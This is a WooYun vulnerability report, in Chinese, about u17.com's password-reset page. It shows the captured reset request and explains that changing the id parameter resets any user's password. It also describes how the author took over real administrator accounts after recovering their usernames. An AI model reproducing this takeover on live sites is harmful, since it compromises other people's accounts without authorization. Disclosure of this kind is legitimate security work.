WooYun.org

使用邮件找回密码处出现逻辑问题.
使用一个已知帐号找回密码.
得到如下链接地址
http://passport.u17.com/member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015
访问后如下图:

在此处输入新密码提交时抓包得到如下内如:

POST /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 HTTP/1.1
Host: passport.u17.com
Proxy-Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Origin: http://passport.u17.com
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://passport.u17.com/member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
new_password=zzzzzz&confirm_password=zzzzzz&%E6%8F%90%E4%BA%A4=

cookies里并无任何与此操作相关的信息.post的数据中只提交了新密码.
我们可以看到提交地址里用get方式提交了用户ID.这里是识别修改哪个用户密码的标识.
修改此处ID.重新做一次提交.得到下图:

成功修改密码.
此时对有妖气的管理员来一次密码修改.
我们通过访问自己的个人空间可以得到用户ID
如
http://i.u17.com/1844269/
可以得到用户ID1844269
但只能得到其ID和昵称.即使修改了密码也不知道帐号.无法进行登陆.
此时我们访问
http://i.u17.com/1
得到管理员昵称是
Xcily
我尝试使用昵称做为帐号.失败了.
这个时候看到一个贴心的小功能.
叫做
记不清用户名？但是记得昵称，点击这里试试看
http://passport.u17.com/member/forgot_begin.php
然后输入管理员昵称.

您的账户名x*******9
X开头,9结束.
我们把管理员的昵称放在百度上搜索了一下.

xcily0429
然后使用次帐号尝试..存在这个帐号...
修改用户ID为1的密码.
使用
xcily0429登陆成功.

管理员帐号.
尝试了下论坛.此帐号在论坛ID也是1.但由于论坛的后台设置了访问权限.403了...
又尝试了其他几个管理员.都成功修改并且进入了其帐号.
没做其他任何操作.只是想唤起管理员警觉.
非常喜欢有妖气的动漫.管理员xcily也是个技术宅.希望有机会能一起交流一下.
庆祝十万个冷笑话更新第二集!!!